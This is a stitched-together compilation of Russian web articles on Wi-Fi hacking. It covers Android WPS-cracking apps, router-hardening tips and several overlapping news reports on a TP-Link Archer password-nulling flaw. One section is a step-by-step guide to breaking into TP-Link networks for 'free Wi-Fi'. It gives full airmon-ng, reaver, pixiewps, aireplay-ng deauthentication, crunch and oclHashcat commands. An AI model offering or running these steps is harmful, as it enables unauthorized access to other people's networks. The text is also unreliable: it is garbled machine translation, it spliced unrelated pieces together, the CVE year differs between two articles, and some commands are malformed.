Взлом WiFi на Андроид. Kali NethunterПригоден ли для вардрайвинга чип ESP8266
С модой на IoT распространение получил крохотный беспроводной контроллер ESP8266, а хакеров стала преследовать мысль прорубить на нем мониторинговый режим. И в итоге этого удалось добиться! Но к сожалению, полноценный мониторинг и инъекция пакетов на этом чипе невозможны в силу хардварных ограничений на размер буфера в 128 байт.
Взлом WiFi на Андроид. ESP8266Такого буфера, конечно же, не хватит на полноценную ловлю хендшейков. Однако его вполне достаточно для отправки deauth-фреймов. Коллекцию разного рода проектов для ESP8266 (в том числе и для deauth) я собрал на своем GitHub. Также хочу обратить твое внимание на проект по Wi-Fi-позиционированию на основе ESP8266.
Какие еще микроконтроллеры можно использовать
Режим монитора доступен на Ti CC3200 в рамках их фирменной технологии RFSniffer. Надо сказать, что возможность мониторинга на чипах серии Chipcon фирмы Texas Instruments уже привела к появлению таких продуктов, как Yardstick/RFCat и Ubertooth. Они предназначены для хакинга ISM и Bluetooth соответственно.
Насколько реально на практике использовать Ti CC3200?
Задавшись этим вопросом, я купил девбоард, но руки до него пока не дошли. Возможно, когда это случится, у меня появится тема для интересной статьи!
Взлом WiFi на Андроид: Подготовка
Существует множество типовых атак на точки доступа Wi-Fi и специфических эксплоитов для определенных моделей с конкретными версиями прошивок. К типовым относятся методы подбора WPS PIN, вычисление ключей WEP и WPA2 по анализу перехваченных пакетов, а также принудительное переключение AP на более слабый алгоритм шифрования (WEP вместо WPA).
Особняком стоят методы социального инжиниринга: создание поддельных AP (идентичных атакуемой) для получения пароля от настоящей или же для проведения различных MitM-атак, а также деавторизация/глушение беспроводных клиентов и DoS как самостоятельные цели.
Самый универсальный способ атаки на точку доступа — вычисление ее ключа WPA2 по отдельным сообщениям (M1-M4) из перехваченных хендшейков. Он срабатывает практически всегда, но требует больших затрат (особенно времени). Перехват «рукопожатий» всегда выполняется в режиме мониторинга, который поддерживает далеко не каждый Wi-Fi-чип и драйвер. Для ускорения сбора хендшейков потребуется функция инжекта пакетов, которая деавторизует подключенных к AP клиентов и заставляет их чаще отправлять «рукопожатия». Она и вовсе встречается у единичных Wi-Fi-модулей.
За редким исключением предустановленные в смартфон драйверы не позволяют даже запускать режим мониторинга, да и альтернативные драйверы для встроенных чипов есть не всегда. Поэтому для взлома чаще используют внешние USB Wi-Fi адаптеры с hacker friendly чипами (преимущественно от Atheros и Ralink). Подробнее смотри в статье «Выбираем бюджетный адаптер для взлома Wi-Fi».
Однако есть и обходной путь, не требующий покупки оборудования или мучений с драйверами. У многих точек доступа с надежной защитой (вроде WPA2 PSK CCMP) порой оказывается разрешен WPS — дополнительный вариант авторизации по пин-коду. Этот пин часто остается дефолтным и легко вычисляеться.
Теоретически у восьмизначного WPS-пина всего 100 миллионов комбинаций, из которых уникальны только 10 миллионов, так как последняя цифра — контрольная и зависит от других семи. На практике же достаточно перебрать только 11 тысяч вариантов из-за уязвимостей самого алгоритма (концептуально подобных найденным в LM-хеше, подробнее здесь).
Брутфорс 11 тысяч PIN-кодов при хорошем уровне сигнала займет примерно полдня, поскольку на проверку одного пина тратится от двух до десяти секунд. Поэтому на практике используются только самые быстрые атаки на WPS — по дефолтным значениям пинов и по их сниженной энтропии (pixie dust). Для противодействия брутфорсу пин-кодов и подключению к фейковой точке доступа между AP и клиентскими устройствами предусмотрен обмен хешами. По задумке они должны вычисляться на основе WPS PIN и двух случайных чисел. На практике многие роутеры либо генерируют предсказуемые числа, либо вовсе оставляют их нулевыми. Энтропия резко снижается, а механизм, задуманный для усиления защиты, из-за некорректной реализации лишь ослабляет её. Также некоторые производители задают WPS-пин как производное от других известных значений (в частности, MAC-адреса). Такие точки доступа вскрываются практически мгновенно.
Актуальность WPS-атак состоит еще и в том, что в некоторых точках доступа функция Wi-Fi Protected Setup включена по умолчанию и не отключается штатными средствами. Из-за кривой прошивки девайса в его меню настроек либо нет соответствующего пункта, либо положение переключателя Enable/Disable в нем не играет роли. Видимо, это одна из причин того, почему в любом городе среди множества «защищенных» беспроводных сетей до сих пор хватает легких целей.
Взлом WiFi на Android: Разведка
Весь процесс вардрайвинга можно разделить на два этапа: сбор информации о точках доступа и непосредственно их взлом. Существует множество способов просканировать беспроводные сети со смартфона, но по информативности они сильно отличаются. Одни программы показывают просто SSID и уровень сигнала подобно системному приложению, а другие отображают все параметры найденных AP. В частности, указывают тип защиты и позволяют фильтровать список по разным критериям.
Среди таких приложений я бы рекомендовал использовать WiFinspect. Он написан под руководством доктора Тома Клосиа (Tom Clothia) из Бирмингемского университета в 2012 году. Текущая версия 1.2 позволяет выполнять аудит согласно стандарту безопасности данных PCI DSS 2. С ней ты получишь исчерпывающую информацию о режимах работы найденных точек доступа Wi-Fi, сможешь сразу же выполнить их простейший пентест по дефолтным паролям и многое узнать о подключенных устройствах. Приложение бесплатное и не содержит рекламы, однако для большинства его функций потребуется root.
Аудит в WiFinspect
Дополняет WiFinspect другое популярное приложение — Wifi Analyzer. Оно умеет сканировать диапазоны 2,4 и 5 ГГц и работает без прав суперпользователя. Wifi Analyzer отображает кучу данных, включая номер канала выбранной AP, ее MAC-адрес, производителя (вычисляется по MAC), и так же детально расписывает типы шифрования. Для этого достаточно отметить в настройках «Показывать полный уровень безопасности». Минус у программы один — навязчивая реклама во всех окнах Wifi Analyzer. Ее можно убрать при помощи AdAway (но тогда все равно понадобится root) или купив платную версию.
Wifi Analyzer показывает AP и их параметры
Оба приложения отлично дополняют друг друга, работая практически на любом девайсе с Android 2.3 и новее. Они удобны для разведки эфира и предварительного выбора целей. Все найденные AP можно отсортировать по уровню сигнала и степени защиты. Так сразу определяются наиболее доступные AP.
В Google Play есть и опенсорсный WiFiAnalyzer. Он бесплатный, без рекламы, умеет фильтровать AP по типу защиты и даже пытается вычислить расстояние до них в метрах (как если бы они все вещали прямой наводкой). Однако в нем нет режима «охоты на лис» — непрерывного измерения уровня сигнала выбранной точки доступа. В остальном программа идентична.
Интересно, что некоторые владельцы просто скрывают SSID своей беспроводной сети, не утруждая себя настройкой авторизации. Другие настраивают строгую авторизацию в диапазоне 2,4 ГГц, но напрочь забывают о параллельно работающем 5 ГГц. Среди двухдиапазонных точек доступа встречаются и такие «полузакрытые».
Взлом WiFi на Андроид: Подводные камни
Успешность разведки зависит от установленного в смартфоне модуля беспроводной связи. Он может иметь как аппаратные, так и программные ограничения. Аппаратные касаются чувствительности приемника и поддержки им различных стандартов из набора IEEE 802.11. Далеко не во всех смартфонах есть двухдиапазонный Wi-Fi. Программные же часто зависят от используемого драйвера и установленного региона.
Про драйверы поговорим в следующей части, а пока обрати внимание на один не самый очевидный момент: в разных регионах земного шара выделены свои диапазоны частот в рамках единого стандарта. Например, для 802.11b/g/n это 2412–2484 МГц или 14 частотных каналов с шагом базовой частоты 5 МГц. Однако в России 14-й канал использовать запрещено, а 12-й и 13-й — не рекомендуется из-за того, что при ширине канала в 20–40 МГц слишком велик риск возникновения помех на запрещенной частоте. Сходная ситуация сложилась на Украине и в других странах бывшего СССР. Поэтому практически все оборудование с поддержкой Wi-Fi, предназначенное для региона СНГ, де-факто работает только на каналах 1–11 или даже 1–10.
Этим осторожно (и не всегда законно) пользуются продвинутые технари в своих интересах. К примеру, одна фирма подключает на каналах 12–13 беспроводное оборудование для видеонаблюдения, чтобы минимизировать помехи от соседних AP. Вардрайверы же просто меняют региональные настройки и получают доступ к «закрытым» каналам. Подсказка: в Японии пока разрешены все 14.
Технически беспроводную связь по стандартам 802.11b/g/n можно организовать и на нестандартных частотах (ниже 2412 МГц), но для этого потребуется специфическое оборудование и лицензия, а не просто разрешение местного радиочастотного центра. Шанс получить такой пакет документов у частного лица практически нулевой.
Взлом WiFi на Android: Приложения
Приложения для перебора WPS пинов на Android
В Google Play полно приложений для перебора WPS-пинов, поскольку это единственная атака, работающая на любом рутованном телефоне (до версии Android 4.4) и даже без рута (начиная с Android 5.0). Однако большинство из этих приложений написаны абы как, и их практическая польза очень сомнительна.
К примеру, WPSbr Free зачем-то пытается перебирать все 100 миллионов пин-кодов, проверяя их по два раза даже при хорошем уровне сигнала. Полный перебор таким способом займет примерно 16 лет, но большинство AP заблокируют лобовую атаку гораздо раньше. После очередного неверного пин-кода клиентское устройство попадет в черный список, и для продолжения брута придется менять MAC-адрес.
Бессмысленный переборБолее корректный подбор пинов выполняет программа WPSApp. Она позволяет отфильтровать все найденные точки доступа. Оставляет в списке только имеющие активный WPS и сортирует их по убыванию SNR.
Список целейВсе потенциально уязвимые точки доступа в WPSApp отображаются знаком вопроса. Для них предлагается попробовать один из пяти дефолтных пин-кодов. Автор программы не стал заморачиваться со скриптом перебора и предложил сделать это вручную, зато двумя способами — с рутом и без.
Если же дефолтный пин-код заранее известен (вычисляется как производное от MAC-адреса по алгоритму ComputePIN), то такая точка доступа отмечается зеленой галочкой.
Вычисленный WPS PINЕсли пин-код подошел, то ты сразу получишь пароль к Wi-Fi (WPA-PSK), каким бы сложным и длинным он ни был. Пароль можно сохранить и перейти к следующей точке доступа. Спустя какое-то время твой телефон сможет использовать Wi-Fi там, где раньше ловил только 3G/4G.
Успешный подбор WPS PIN и пароляWPSApp видит скрытые сетиЧуть более продвинутая утилита — WiFree WPS. По сути это гибрид WPS PIN и Router Keygen. В нее зашито больше дефолтных пинов и паролей доступа к маршрутизаторам, а также есть функция их автоматического перебора. Плюс она показывает сохраненные пароли Wi-Fi и все настройки текущего подключения.
Мгновенное вычисление пароля для Zyxel Keenetic с дефолтным пиномИнтерфейс у программы аляповатый, но довольно информативный. Она анализирует тип защиты, производителя и уровень сигнала всех найденных точек доступа. Зеленым отображаются AP с наиболее высокой вероятностью взлома. Серым — те AP, на которых стоит перебрать 10–20 стандартных пинов, а красным — те, которые быстро вскрыть не удастся. Например, у них очень низкий уровень сигнала или вовсе отсутствует авторизация по WPS PIN. В WiFree WPS доступно два режима атаки: с рутом (требуется патч и BusyBox) и без рута (работает на Android 5.0 и выше, причем быстрее, чем в аналогичных программах).
Автоматический перебор пинов в WiFree WPSЕсли в базе данных программы нет дефолтных пин-кодов для устройств данного производителя, такая точка доступа будет отображаться красным. Ты можешь попробовать подключиться к ней, вводя WPS PIN вручную. Помешать успешному взлому могут и другие факторы: низкий уровень сигнала, режим WPS-авторизации по нажатию кнопки, изменение дефолтного пина, фильтрация по MAC-адресу.
Автоматический перебор пинов в WiFree WPSПосле того как ты подобрал WPS PIN и узнал пароль точки доступа, можно подключаться к ней и изучать беспроводную сеть. Для этого рекомендую использовать бесплатный набор утилит Fing — Network Tools.
Приложение имеет аккуратный и наглядный интерфейс, а все пункты меню говорят сами за себя. Например, можно просканировать точку доступа и узнать о ней массу деталей.
Fing показывает информацию о точке доступаЗатем разослать ARP-пакеты и обнаружить все подключенные хосты в этой беспроводной сети (в том числе и твой смартфон).
Fing показывает все хосты в беспроводной сетиПосмотреть доступные сервисы и открытые порты на любом узле в этой сети.
Fing определяет доступные сервисы на роутереFing даже предлагает сразу же подключиться к любому из них, например по Telnet.
Подключаемся по Telnet к найденным хостамПростор для фантазии здесь открывается очень большой. Можно даже удаленно включить спящее устройство, если оно поддерживает технологию Wake-on-LAN, или устроить общую побудку широковещательным запросом WOL.
Fing трубит подъем!Продолжение следует…
Еще по теме: Лучшие хакерские приложения для Android
Взлом WiFi роутера — как защититься?!
За последний месяц у нескольких моих товарищей взломали домашний Вай-фай маршрутизатор. Причём сделал это не хакер-сосед, вскрывший сеть WiFi, а очень необычный вирус, пойманный в Интернете. Он создан специально для того, чтобы сделать взлом пароля роутера.
Зачем это делается? Тут всё просто. В настройках внешнего соединения WAN вручную указываются адреса DNS-серверов, да не обычных, а весьма специфических. Они перенаправляют все запросы пользователей на вредоносные веб-сайты, где с помощью хитростей и социальной инженерии выманиваются логины и пароли для платёжных систем, онлайн-банкинга и даже аккаунты социальных сетей.
Причём, на некоторых моделях, избавиться от результатов работы вируса бывает ой как не просто — приходится делать полный сброс настроек с последующей настройкой. А ведь перекрыть злоумышленникам возможность взломать роутер очень просто. Для этого надо потратить несколько минут своего времени и выполнить два очень простых совета.
Как предотвратить взлом WiFi роутера?!
Стандарты безопасности требуют обязательно устанавливать на доступ к конфигурации маршрутизатора сложный пароль, дабы злоумышленники не могли зайти в веб-интерфейс или подключиться используя telnet или ssh.
Поэтому первым делом идём в веб-интерфейс маршрутизатора или модема и в разделе Management (Управление) ищем подраздел Admin Password (Пароль администратора).
Теперь придумываем пароль посложнее и вбиваем его в поля. Главное, после этого сами не забудьте ключевую последовательность символов. Сохраняем настройки.
Ещё один очень важный совет — старайтесь в обязательном порядке обновлять прошивку роутера до самой последней версии. Производитель, как правило, оперативно реагирует на появление уязвимостей, используемых вирусом и старается их как можно скорее устранить.
Поэтому идём на сайт производителя и скачиваем самую последнюю версию прошивки для своей модели маршрутизатора или модема.
После этого надо опять зайти в веб-интерфейс и в разделе Management (Управление) найти пункт Firmware Upgrade (Обновление программы). Он у всех марок и моделей выглядит примерно одинаково:
Нажимаем на кнопочку «Browse(Обзор)», выбираем файл скачанной прошивки и нажимаем на кнопку «Upgrade(Обновить)». После этого запуститься процесс обновления микропрограммы, который может занять от 1 до 15 минут, после чего аппарат перезагрузится.
Хотим обратить Ваше внимание, что обычно, при перепрошивке, настройки маршрутизатора не слетают, но бывают и исключения. Именно поэтому мы настоятельно рекомендуем перед тем как перепрошить роутер, обязательно сохранить его конфигурацию на компьютер.
Уязвимость в TP-Link Archer позволяет захватить контроль над устройством
Уязвимость в TP-Link Archer позволяет захватить контроль над устройством
Alexander Antipov
С помощью особо сконфигурированного запроса атакующий может обнулить пароль администратора устройства.
Компания TP-Link исправила в некоторых моделях маршрутизаторов Archer опасную уязвимость , позволяющую злоумышленникам аннулировать пароль администратора и захватить контроль над устройством по LAN через Telnet. Проблема затрагивает маршрутизаторы Archer C5 V4, Archer MR200v4, Archer MR6400v4 и Archer MR400v3.
Для эксплуатации уязвимости атакующий должен отправить HTTP-запрос со строкой, содержащей большее число символов, чем разрешенное количество байтов. В результате пароль администратора аннулируется и заменяется пустым значением. Несмотря на наличие встроенного механизма валидации, вышеописанный способ все равно работает. Дело в том, что механизм проверяет только HTTP-заголовки реферера, и с помощью вшитого значения tplinkwifi.net атакующий может заставить сервис httpd маршрутизатора принять запрос как подлинный.
Поскольку администратор обладает на устройстве правами суперпользователя, обойдя процесс аутентификации, злоумышленник автоматически получит эти права и захватит полный контроль над маршрутизатором. Он сможет не только контролировать все процессы, но также блокировать легитимным пользователям возможность авторизации в web-сервисе через пользовательский интерфейс. В таком случае жертва потеряет доступ к консоли и даже к оболочке и не сможет сменить пароль.
Даже если владельцу маршрутизатора удастся установить новый пароль, злоумышленник снова аннулирует его с помощью запроса LAN/WAN/CGI. И наконец, автоматически перестанут работать ключи RSA, поскольку шифрование не работает с пустыми паролями.
Уязвимость обнаружил исследователь IBM X-Force Red Гжегож Випич (Grzegorz Wypych). Проблеме был присвоен идентификатор CVE-2019-7405.
В нашем телеграм канале мы рассказываем о главных новостях из мира IT, актуальных угрозах и событиях, которые оказывают влияние на обороноспособность стран, бизнес глобальных корпораций и безопасность пользователей по всему миру. Узнай первым как выжить в цифровом кошмаре!
Поделиться новостью:
[100% рабочий] Как взломать TP link Wifi Password
[Pro] Как взломать пароль Wi-Fi для TP-ссылки — Взлом — В этой статье показано, как взломать сеть Wi-Fi. Обычно это ошибка, которая встречается в роутерах.
Если вы хотите стать профессиональным специалистом в области здравоохранения, то иметь полную рабочую станцию для взлома — это первый этап. Хороший хакер всегда следит за тем, чтобы у него было все необходимое — от хороших и мощных периферийных устройств и программного обеспечения / инструментов. Все имеет свою важность, чтобы начать путь к профессиональному хакеру.Если вы работаете в качестве CEH в компании, то, возможно, вам придется регулярно посещать собрания Zoom, и отсутствие невнимательности может испортить впечатление в вашей команде, будь то внешний шум или ваша веб-камера низкого качества. Если вы с нетерпением ждете замены своей веб-камеры, мы хотели бы предложить вам ознакомиться с этой лучшей веб-камерой в Индии, руководство по покупке, чтобы изучить некоторые из самых продаваемых веб-камер, которые использует каждый профессионал независимо от своей профессии.
Итак, давайте без лишних слов погрузимся в руководство по взлому пароля TP Link WiFi.
Сегодня я расскажу, как взломать маршрутизатор TP Link Wi-Fi и взломать Wi-Fi пароль . В этой статье я расскажу вам простой способ получить бесплатный Wi-Fi. В основном эта восприимчивость обнаруживается в Wi-Fi маршрутизатора TP Link. В основном эта статья покажет вам, как взломать сеть Wi-Fi. Обычно это ошибка, которая встречается в маршрутизаторах компании. Вам просто нужно выполнить шаги для взлома из TP Link wifi , он автоматически подключается к Wi-Fi, и это на 100% надежный и проверенный трюк.Просто следуйте посту — Как взломать пароль Wi-Fi .
Примечание: Это сообщение только для ознакомления , и я ни за что не несу ответственности
С помощью этого трюка вы можете легко взломать пароль Wi-Fi binatone. Следуйте инструкциям ниже и используйте бесплатный Wi-Fi рядом с домом.
Шаги, чтобы взломать пароль Wi-Fi для TP Link- Перевести устройство в режим монитора Airmon-ng start wlan0
- Интерфейс мониторинга будет запущен на wlan0mon
- Используйте iwconfig, чтобы проверить , находится ли РЕЖИМ интерфейса в управляемом режиме, если да, то измените его на мониторинг вместо управляемого с помощью следующих команд:
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
- iwconfig check , если сейчас режим мониторинга
- airodump-ng wlan0mon
Запустите airodump-ng , чтобы получить BSSID , MAC-адрес и канал нашей цели.
airodump-ng -i wlan0mon
Теперь выберите свою цель и используйте BSSID и канал для Reaver:
Reaver -i wlan0mon -b [BSSID] -vv -S -c [канал AP]
Нам нужны PKE, PKR, e-hash 1 & 2, E / R-nonce и ключ авторизации от Reaver для использования для pixiewps.
Теперь запустите pixiewps со следующими аргументами:
Компоненты:
– E-Hash2 — это хеш, в котором мы перебираем первую половину PIN-кода.
— E-Hash3 — это хеш, в котором мы перебираем вторую половину PIN-кода.
– HMAC — это функция, которая хеширует все данные в скобках. Это функция HMAC-SHA-256.
— PSK1 — первая половина PIN-кода маршрутизатора (10 000 вариантов)
— PSK2 — вторая половина PIN-кода маршрутизатора (1 000 или 10 000 вариантов в зависимости от того, хотим ли мы вычислить контрольную сумму. Мы просто делаем 10 000, потому что это не имеет значения разницы во времени, и это просто проще.)
— PKE — открытый ключ зарегистрированного пользователя (используется для проверки законности обмена WPS и предотвращения повторов.)
— PKR — открытый ключ регистратора (используется для проверки законности обмена WPS. и предотвратить повторы.)
Этот маршрутизатор не уязвим для Pixie Dust WPS Attack .
Reaver WPS PIN-атакаПопробуем взломать этот роутер с помощью Reaver. Запускаем Reaver с задержкой 5 секунд и имитируем win7 PC:
reaver -i wlan0mon -b [BSSID] -vv -c 1 -d 5 -w
Грубое форсирование маршрутизатора с помощью oclHashcat
Давайте посмотрим, сможем ли мы получить пароль путем перехвата четырехстороннего рукопожатия и автономной атаки грубой силой со списком паролей маршрутизатора по умолчанию.Мы будем использовать следующие инструменты:
- Crunch для создания списка паролей.
- Airodump-ng для захвата 4-стороннего рукопожатия.
- airplay-ng для принудительного отключения подключенных клиентов.
- oclHashcat GPU в Windows.
Давайте запустим Crunch с помощью следующей команды:
кранч 8 8 1234567890 -o /root/Desktop/88numlist.txt
Это может занять некоторое время, в результате получится список слов размером 900 МБ, содержащий все возможные комбинации из 8 цифр.Этот список слов взломает беспроводную сеть маршрутизатора TP link WR841N со 100% уверенностью.
Давайте зафиксируем рукопожатие с помощью Airodump-ng и Aireplay-ng и запустим Airodump-ng, чтобы найти нашу цель, с помощью следующей команды:
airodump-ng wlan0mon
Теперь выберите BSSID цели и канал и перезапустите Airodump-ng с помощью следующей команды и найдите подключенного клиента:
airodump-ng –bssid [BSSID] -c [канал] -w [путь к файлу для хранения.крышка] wlan0mon
Теперь деаутентифицируйте подключенного клиента, используя Aireplay-ng в новом терминале.
aireplay-ng -0 2 -a [BSSID] -c [MAC-адрес клиента] wlan0mon
Успешное деаутентификация и четырехстороннее рукопожатие зафиксировано!
Aircrack-ng aireplay-ng
Шаг 3. Bruteforce со списком паролей маршрутизатора по умолчанию
Мы будем использовать oclHashcat GPU в Windows, чтобы взломать пароль WiFi, используя список паролей, который мы создали ранее.
Сначала мы должны преобразовать файл .cap в .hccap , используя следующую команду:
aircrack-ng -J [Путь к файлу для сохранения файла .hccap] [Путь к файлу .cap]
Запустите oclHashcat в Windows, используя следующую команду:
oclhashcat64.exe -m 2500 -w 3 - [gpu-temp-keep = 60] –status -o cracked.txt tplink.hccap 88numlist.txt
Примечание: –gpu-temp-keep стоит только драм.
Так это Как взломать TP Link Wifi Password . Взломайте Tp Link и наслаждайтесь бесплатным Wi-Fi.
МаршрутизаторыTP-Link Archer позволяют удаленное управление без паролей.
TP-Link устранила критическую уязвимость, затрагивающую некоторые маршрутизаторы TP-Link Archer, которая может позволить злоумышленникам войти в систему без паролей.
TP-Link устранила критическую уязвимость нулевого дня ( CVE-2017-7405 ) в своих маршрутизаторах TP-Link Archer, которая могла использоваться злоумышленниками для удаленного управления локальной сетью через соединение Telnet без аутентификации.
«Это недостаток нулевого дня, о котором ранее не сообщалось, и он может повлиять как на домашнюю, так и на бизнес-среду». — объяснил Гжегож Выпич из IBM X-Force Red (он же @ horac341). «В случае эксплуатации эта уязвимость маршрутизатора может позволить удаленному злоумышленнику взять под контроль конфигурацию маршрутизатора через Telnet в локальной сети (LAN) и подключиться к серверу протокола передачи файлов (FTP) через LAN или глобальную сеть (WAN). .”
Уязвимость может позволить неавторизованный доступ третьих лиц к маршрутизатору с правами администратора без надлежащей аутентификации.
Уязвимость может быть вызвана злоумышленником путем отправки HTTP-запроса, содержащего строку, длина которой превышает ожидаемую длину строки, в результате чего пароль полностью аннулируется и заменяется пустым значением.
Эксперт объяснил, что проверка общего интерфейса шлюза (CGI) основана только на HTTP-заголовках реферера.Это означает, что если он совпадает с IP-адресом или доменом, связанным с tplinkwifi.net , то основная служба маршрутизатора, HTTPD, распознает его как действительный.
Поскольку маршрутизаторы TP-Link Archer реализуют только тип пользователя admin с привилегиями root, а все процессы запускаются от имени root, злоумышленник может действовать как администратор и получать полный контроль над устройством.
Злоумышленники также могут заблокировать законных пользователей, которые больше не смогут войти в веб-службу устройства.
«В таком случае жертва может потерять доступ к консоли и даже к оболочке и, таким образом, не сможет восстановить новый пароль». продолжает пост. «Даже если бы существовал способ установить новый пароль, следующий уязвимый запрос LAN / WAN / CGI снова аннулировал бы пароль. Таким образом, единственный доступ будет к файлам FTP через соединение через порт USB ».
Эксперты также отметили, что ключ шифрования RSA не работает, поскольку он не предназначен для работы с пустым паролем.
«Риск выше в бизнес-сетях, где такие маршрутизаторы могут использоваться для включения гостевого Wi-Fi. Если его разместить в корпоративной сети, скомпрометированный маршрутизатор может стать точкой входа для злоумышленника и местом, откуда можно развернуться при разведке и тактике бокового перемещения ». — заключает эксперт.
TP-Link уже устранила этот недостаток, выпустив следующие исправления безопасности для маршрутизаторов Archer C5 V4, Archer MR200v4, Archer MR6400v4 и Archer MR400v3:
Прошивка для Archer C5 V4:
https: // static.tp-link.com/2019/201909/20190917/Archer_C5v4190815.rar
Лучник MR200v4:
https://static.tp-link.com/2019/201909/20190903/Archer%20MR200(EU)_V4_201
.zipЛучник MR6400v4:
https://static.tp-link.com/2019/201908/20190826/Archer%20MR6400(EU)_V4_201
.zipЛучник MR400v3:
https://static.tp-link.com/2019/201908/20190826/Archer%20MR400
Пьерлуиджи Паганини
( SecurityAffairs — TP-Link Archer, взлом)
Поделиться
Многочисленные незащищенные маршрутизаторы TP-Link (с именем пользователя и паролями по умолчанию), подверженные риску удаленного взлома / Digital Information World
Многие маршрутизаторы TP-Link доступны для ошибок, которые можно использовать для управления устройством без физического контакта.Компании потребовалось больше года, чтобы опубликовать исправления на своем веб-сайте.
Чувствительность маршрутизаторов позволяет любому некомпетентному злоумышленнику получить полный доступ к уязвимому маршрутизатору.
Для полного использования маршрутизатора используется пароль по умолчанию.
В наихудших условиях любой угонщик может нацелить уязвимые устройства в огромных масштабах.
Они могли сделать это, взломав маршрутизаторы и прочесывая сеть с использованием паролей по умолчанию, таких как «admin» и «pass».”
В октябре 2017 года создатель британской фирмы Fidus Information Security, занимающейся кибербезопасностью, Эндрю Маббитт обнаружил эту ошибку удаленного выполнения кода и сообщил TP-Link.
В ответ, после того, как TP-Link опубликовала патч для небезопасного маршрутизатора WR940N, TP-Link была проинформирована Эндрю Маббиттом о другом маршрутизаторе WR740N в январе 2018 года.
Причина, по которой маршрутизатор WR740N уязвим для та же ошибка заключалась в том, что компания повторно использовала небезопасный код в устройствах.
По заявлению компании, оба маршрутизатора были немедленно отремонтированы, но прошивка для WR740N не была доступна на их веб-сайте при проверке.
Долгое время маршрутизаторы пользовались дурной репутацией из-за проблем с безопасностью.
Все подключенные устройства будут затронуты, если в маршрутизаторе будет обнаружена хотя бы одна ошибка.
По словам Эндрю Маббита, любой злоумышленник может создать хаос в сети, получив полную команду через маршрутизатор. Изменение настроек маршрутизатора влияет на всех, кто подключен к одной сети, например, изменение настроек DNS с целью обмана пользователей для кражи их учетных данных путем отправки их на поддельную страницу.
TP-Link отказалась предоставить информацию о том, сколько уязвимых маршрутизаторов было продано, но заявила, что WR740N был остановлен годом ранее, в 2017 году.
При проверке обнаруженных устройств с помощью двух поисковых систем каждая из них предположила, что их где-то между 129000 и 149 000 устройств в Интернете, хотя уязвимых устройств, вероятно, будет гораздо меньше. Бразилия, Пакистан и Болгария входят в тройку стран с наибольшим числом затронутых устройств.
Эндрю Маббитт заявил, что TP-Link несет ответственность за оповещение покупателей о том, что тысячи устройств все еще не защищены, вместо того, чтобы ждать, пока клиенты обратятся в службу технической поддержки TP-Link.
И Великобритания, и США готовы быстро потребовать от агентств продавать гаджеты с определенными паролями по умолчанию, чтобы ботнеты не перехватывали сетевые устройства в больших масштабах и не использовали общую пропускную способность интернета для отключения веб-сайтов.
Читать далее: «Почти все, что подключено к Интернету, находится под угрозой» — отчеты показывают, что популярное приложение для социальных сетей подверглось атаке
Обновите эти маршрутизаторы TP-Link, чтобы исправить критическую уязвимость пароля
Если у вас есть один из четырех маршрутизаторов TP-Link, включая TP-Link Archer C5 (v4), вы захотите найти и установить его последнюю версию прошивки обновите прямо сейчас.Патч устраняет критическую уязвимость, которая в противном случае позволила бы злоумышленнику получить полный контроль над вашим маршрутизатором — административный доступ и все остальное — и заблокировать вас.
Уязвимость, первоначально обнаруженная Гжегожем Выпичом из потрясающе звучащей хакерской группы IBM X-Force Red, похоже, требует, чтобы кто-то имел доступ к сети с по ваш маршрутизатор, чтобы начать работу. Хотя это делает это немного менее применимым, если у вас есть отличный пароль Wi-Fi (и хороший замок на входной двери), это не означает, что нет других уязвимостей, которые квалифицированный злоумышленник мог бы использовать, чтобы проникнуть в вашу сеть или отправить команды на ваш роутер.
Даже если этот взлом с большей вероятностью затронет корпоративные сети или где-либо еще, где скомпрометированный маршрутизатор может быть использован в качестве вектора для более крупной атаки, нет причин лениться и обновить прошивку вашего устройства дома. Несколько минут, потраченных на эту простую задачу, могут спасти вам мир от боли, как описывают Випич и соавтор статьи Лимор Кессем в Security Intelligence:
После получения доступа администратора без реальной аутентификации мы обнаружили, что это конкретное устройство также позволяет настраивать FTP в WAN.Кроме того, мы могли удаленно управлять маршрутизатором через безопасное соединение HTTPS, которое также уязвимо для этой атаки CGI. Воздействие и последствия этой уязвимости маршрутизатора, если она используется злонамеренной третьей стороной, могут быть пагубными.
Не только злоумышленники могут получить привилегированный доступ, но и законный пользователь может быть заблокирован и больше не сможет войти в веб-службу через пользовательский интерфейс, поскольку эта страница больше не будет принимать какие-либо пароли (без ведома пользователя). Пользователь).В таком случае жертва может потерять доступ к консоли и даже к оболочке и, таким образом, не сможет восстановить новый пароль. Даже если бы существовал способ установить новый пароль, следующий уязвимый запрос LAN / WAN / CGI снова аннулировал бы пароль. Таким образом, единственный доступ будет к файлам FTP через соединение USB-порта.
Уязвимость, которая позволяет этому случиться, необычная, но, казалось бы, простая. Атака, известная как «переполнение пароля», включает в себя подмену заголовков HTTP, чтобы они выглядели так, как будто запрос на вход поступает с IP-адреса маршрутизатора или домена, используемого маршрутизаторами TP-Link в процессе начальной настройки — tplinkwifi.сеть.
Маршрутизатор считает запрос входа в систему законным, и отправка строки пароля с запросом, который короче, чем ожидает маршрутизатор, не позволяет любому пользователю войти в систему с правильным паролем. (По сути, это атака типа «отказ в обслуживании».) Отправка более длинной строки пароля исключает ранее действующий пароль, предоставляя злоумышленнику полный незащищенный доступ к маршрутизатору.
G / O Media может получить комиссию
Обновите прошивку вашего роутера прямо сейчас
Чтобы устранить эту уязвимость, TP-Link выпустила обновления прошивки для уязвимых роутеров.Я рекомендую проверить нижнюю или заднюю часть вашего маршрутизатора, чтобы убедиться, что у вас есть (и номер его аппаратной версии, например «V4»), и загрузить обновления прямо сейчас, если у вас есть один из этих четырех маршрутизаторов:
Снимок экрана: Дэвид Мерфи
Как только вы это сделаете, откройте веб-экран конфигурации вашего маршрутизатора, войдите в систему и найдите раздел, связанный с обновлениями прошивки. Чтобы использовать C5 в качестве примера, вам нужно будет щелкнуть вкладку Advanced вверху прокрутите вниз до «Системные инструменты», и нажмите «Обновление прошивки».” Затем вы можете найти загруженное (и разархивированное) обновление прошивки и установить его на свое устройство с помощью большой кнопки« Обновить ».
Хотя было бы замечательно , если бы все маршрутизаторы могли просто пинговать сервер обновлений и автоматически загружать и устанавливать обновления прошивки для вас, это не так. Обычно ответственность за обновление маршрутизатора лежит на вас. И я это понимаю; Постоянная проверка веб-сайта на наличие обновлений прошивки — это раздражающий процесс.
